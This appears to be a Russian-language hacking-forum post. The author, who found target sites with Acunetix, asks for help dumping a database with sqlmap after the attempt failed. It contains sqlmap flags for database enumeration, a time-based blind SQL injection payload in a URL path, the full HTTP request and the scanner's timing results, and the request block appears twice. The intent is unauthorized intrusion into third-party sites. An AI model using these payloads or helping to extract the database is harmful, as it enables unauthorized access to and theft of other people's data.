Привет всем только начал заниматься сканированием сайтов через Acunetix и нашел несколько интересных мне ресурсов но не как не могу слить бд или продвинуться дальше во взломе пытался засунуть запрос в файл вот так -r file.txt --dbs --dbms=MySQL --risk=3 --level=5 -v3 и скормить sqlmap-у но увы не вышло или что то делаю не правильно либо хз подскажите кто может.
сам запрос
GET /0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z/news-aggregator-iphone-app HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive
детали атаки
Path Fragment input /[*]/<s> was set to 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
Tests performed:
сам запрос
Скрытый контент для зарегистрированных пользователей.
GET /0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z/news-aggregator-iphone-app HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive
детали атаки
Скрытый контент для зарегистрированных пользователей.
Path Fragment input /[*]/<s> was set to 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
Tests performed:
- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 17.089
- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.181
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 19.111
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.984
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 9.067
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.93
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 15.08